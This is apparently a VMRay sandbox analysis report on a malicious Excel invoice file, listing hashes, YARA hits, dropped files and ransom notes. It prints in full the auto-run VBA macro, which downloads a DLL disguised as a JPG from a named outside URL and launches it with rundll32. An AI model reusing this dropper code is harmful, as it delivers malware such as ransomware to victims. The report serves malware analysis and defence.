ed58323b...8657 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Downloader
Threat Names:
Mal/HTMLGen-A

Ponuda-2020-0231.xlsm

Excel Document

Created at 2020-01-09T14:30:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm Sample File Unknown
Malicious
...
»
Mime Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 76.29 KB
MD5 69450923d812f3696e8280508b636955 Copy to Clipboard
SHA1 1f128c49a02483d6db545c166b192648a03ea6b5 Copy to Clipboard
SHA256 ed58323b71a87a44ff98fbb2e30c89ef7f3439f0fcb61b4d1cf32d880b088657 Copy to Clipboard
SSDeep 1536:zZCsGB+7ViGwWlw8LDY9O8i373ofoD9ybPtwvg0Cd35AsAl0GRwdxBP2r3EDXPV+:zZCsGKVtwWlw8LU9O8i373++9Mtw40E6 Copy to Clipboard
ImpHash None Copy to Clipboard
Office Information
»
Create Time 2019-06-15 17:41:26+00:00
Modify Time 2020-01-09 12:53:50+00:00
Document Information
»
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Titles Of Parts 'Service Invoice'!Print_Area, Service Invoice
ContentTypeId ['0x01010079F111ED35F8CC479449609E8A0923A6']
ScaleCrop False
SharedDoc False
VBA Macros (3)
»
Macro #1: Module1
» 
Attribute VB_Name = "Module1"
Sub Execute()

    Dim wsh As Object
    Set wsh = VBA.CreateObject("WScript.Shell")
    Dim waitOnReturn As Boolean: waitOnReturn = False
    Dim windowStyle As Integer: windowStyle = 1

    wsh.Run "rundll32.exe Afrodita.dll,Sura", windowStyle, waitOnReturn

End Sub
Macro #2: Module2
» 
Attribute VB_Name = "Module2"
Sub RemoveBanner()
Attribute RemoveBanner.VB_ProcData.VB_Invoke_Func = " \n14"
'
' RemoveBanner Macro
'

'
    ActiveSheet.Shapes.Range(Array("Picture 2")).Select
    Selection.Delete
End Sub
Macro #3: ThisWorkbook
» 
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call RemoveBanner
    
    Dim myURL As String
    Dim appdata As String
    Dim wstring As String
    
    myURL = "http://riskpartner.hr/wp-content/notnice.jpg"
    appdata = CStr(Environ("USERPROFILE") & "\Application Data")
    wstring = "Afrodita.dll"


    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", myURL, False, "username", "password"
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile wstring, 2 ' 1 = no overwrite, 2 = overwrite
        oStream.Close
    End If

    Call Execute
    
End Sub
YARA Matches (3)
»
Rule Name Rule Description Classification Score Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
...
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
...
VBA_Download_Commands VBA macro may attempt to download external content; possible dropper -
3/5
...
Embedded URLs (1)
»
URL First Seen Categories Threat Names Reputation Status WHOIS Data
http://riskpartner.hr/wp-content/notnice.jpg - malware -
Blacklisted
Not Queried
c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 256.00 KB
MD5 8ed682d01fa076cced515bf6b21ba022 Copy to Clipboard
SHA1 e69667b35d101d9cd052697da198c40a88e16e74 Copy to Clipboard
SHA256 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c Copy to Clipboard
SSDeep 384:p8JEJHPiHzw9qthimENkKHK0M/kWJAm0yvCUW0TT0nufeuP6DYAfIc1FAPEOyAa2:pTHPUpI2djFQ7JNAocaKTbUZUzx3S Copy to Clipboard
ImpHash None Copy to Clipboard
main-public.key Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 292 Bytes
MD5 91b9ebb915a478a36e110b130f930c6b Copy to Clipboard
SHA1 f381a5408ec2baf57cdc1d1388868c0edea8ab6e Copy to Clipboard
SHA256 0309f713e59048664d739d8c913d44a88522d193a196bec4ed20db45412d003d Copy to Clipboard
SSDeep 6:sLTWdgfDMyUIhe4ftJ/jZMvY3bVU1r9ZgKhVYogrZfwW7:udDMR4ffNMgrVOpZgQ3gdfh Copy to Clipboard
ImpHash None Copy to Clipboard
client-public.key Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 292 Bytes
MD5 708453bc940aaee8ccbee516c43b9961 Copy to Clipboard
SHA1 9ce03aea69e728445e6e21640c29617fbff2c1df Copy to Clipboard
SHA256 f61bc6ab9e07392815d03105f409c7a03bee2c8879a91ea9e4d9d1bd13653a47 Copy to Clipboard
SSDeep 6:sLTfu6DvrFddLTm+zCmldhlytE9naYmCJtdLddrcUP0:uLu6DlbzTl/AtEMY7jc Copy to Clipboard
ImpHash None Copy to Clipboard
client-encrypted-private.key Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 1.19 KB
MD5 5d55172d3a76ad777ad1197d43e6dc67 Copy to Clipboard
SHA1 5ecc3250f50ee9edaf742620b5c14878cdf98e1b Copy to Clipboard
SHA256 915ddd621024497f820c4d1c3bfe12f0d321668fe91c8289c03cb3aee25680c7 Copy to Clipboard
SSDeep 24:uWuYlnT1AKMl2R9x2r1m2YUwI7GEKux+sTHfYh1IUWCy4:JlT1Jx2xSv0Kux+sTHfYfInCy4 Copy to Clipboard
ImpHash None Copy to Clipboard
client-encrypted-private.key Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 1.70 KB
MD5 885bcb1645597ab3850e859acd8b29e8 Copy to Clipboard
SHA1 af8be73836183e6d75f1476b7f9109eee1a58d38 Copy to Clipboard
SHA256 1b7b39ea4494fc5490f9b20c887875556a68ea2351e27fdcb15488685f7137e3 Copy to Clipboard
SSDeep 48:4x9nSPP0yljEEUnb7CgibZLKtZ8cRjh86G2FjZE4:0eHjEEQpSLKZRjh892pe4 Copy to Clipboard
ImpHash None Copy to Clipboard
C:\Users\aETAdzjz\Music\\__README_RECOVERY_.txt Dropped File Stream
Unknown
...
»
Also Known As C:\Users\aETAdzjz\Documents\7Szrc KGP_Uqu4\s7-eygci4\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Music\bPVNxpM\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\\__README_RECOVERY_.txt (Dropped File)
C:\Users\Public\Documents\\__README_RECOVERY_.txt (Dropped File)
c:\users\aetadzjz\appdata\local\virtualstore\__readme_recovery_.txt (Dropped File)
C:\Users\Public\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\QxC2SVht\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Favorites\\__README_RECOVERY_.txt (Dropped File)
C:\Users\Public\Music\\__README_RECOVERY_.txt (Dropped File)
C:\Users\Public\Pictures\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\QxC2SVht\lgC1uEyqtWk70\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\7Szrc KGP_Uqu4\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\OneNote Notebooks\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\My Shapes\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\tUnbSvuPZT_E\\__README_RECOVERY_.txt (Dropped File)
Mime Type application/octet-stream
File Size 6.84 KB
MD5 28cc3f3e5bba0192515111f2eb003383 Copy to Clipboard
SHA1 b6b761eaa1ca867affddb0ae3354c64fc961a5ce Copy to Clipboard
SHA256 8e986cbc4513ffa5249f609138114c2c172d210623b622dfd70f3b9dbed33389 Copy to Clipboard
SSDeep 96:h6L2QcEjp3sFVh9/VvqA9EF7hA9oRDFtho:h6LfL47eWeDFtO Copy to Clipboard
ImpHash None Copy to Clipboard
C:\Users\aETAdzjz\AppData\Local\Temp\_uninsep.bat Dropped File Batch
Unknown
...
»
Mime Type application/x-bat
File Size 208 Bytes
MD5 483a96f25a37a60eba1e1ff3ee418c51 Copy to Clipboard
SHA1 79eb26525b274ab1d7e882864d1620bd1d1776aa Copy to Clipboard
SHA256 509ae7fe892c68ab1fcdaa42a22bbf2f16d29b3ed95ef3ea2096c043598c8489 Copy to Clipboard
SSDeep 6:mRoio/ek+TiU/ek+tdWI/go2Fo/zpJ23fCG:mRoJ+TB+tYNlCMaG Copy to Clipboard
ImpHash None Copy to Clipboard
C:\Users\aETAdzjz\Desktop\Afrodita.dll Downloaded File Binary
Unknown
...
»
Also Known As c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\notnice[1].jpg (Downloaded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 258.00 KB
MD5 d4b946b51dc21709f87a1a943ad7cbe3 Copy to Clipboard
SHA1 8c2a1c67493eff3990ab30862e094c34e6821eea Copy to Clipboard
SHA256 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b Copy to Clipboard
SSDeep 6144:EXrm0zIiAhjC7Cqa5ZhiIJDQ13Xdksm1Cx2tJk:EbNQaCq6iIJcdksmJtJ Copy to Clipboard
ImpHash None Copy to Clipboard
vbaProject.bin Embedded File Unknown
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Mime Type application/CDFV2
File Size 17.50 KB
MD5 307513404dcdd22ff85bf599a9138e8f Copy to Clipboard
SHA1 8e3556dc5ce2b3d3361aebac3dc2730aacb33d2c Copy to Clipboard
SHA256 320210c50a3fcdea7603cef1a6b35b11b884b4c1a726ec0c3ca33d283759813d Copy to Clipboard
SSDeep 192:saEyP3eFBWPY7HskvL+7byaFEShbel3xCGMi5MFax:lElBYKHrLEzFESl43xCGMi5 Copy to Clipboard
ImpHash None Copy to Clipboard
workbook.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Mime Type text/xml
File Size 1.72 KB
MD5 abcc080fa751d1982107b275ceacd1d0 Copy to Clipboard
SHA1 fbf312b6b03ee2e6a5a647aac9048ee494d28a6a Copy to Clipboard
SHA256 8221830b81cba389c3dd7cfd252daad1fa9c14069f32d07cf8fbc81f1e73552a Copy to Clipboard
SSDeep 48:cV5hmNYZK1BrPBKvBXBZB/niC4tGE+HL60tNIlBuQvX:wXmmZYBrPBsBXBZBmGEFBuQv Copy to Clipboard
ImpHash None Copy to Clipboard
sheet1.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Mime Type text/xml
File Size 12.41 KB
MD5 92a7d1ef5dc788cc054d46f9b979e15d Copy to Clipboard
SHA1 4fcc83ac342c27e95d5c47c6054357706a1375c4 Copy to Clipboard
SHA256 cc2defc1f4e8b1dd73ddc00da16b40d7f1176b259c4215c2470ccb283ee478e4 Copy to Clipboard
SSDeep 192:YXmmZe5mQMuDKpBb9VtodMo8G985RVeF16Pqx8xCcK8pW3vr4aN4yFcF8D:YXmue5mQB+pBb1XGmahNOW Copy to Clipboard
ImpHash None Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image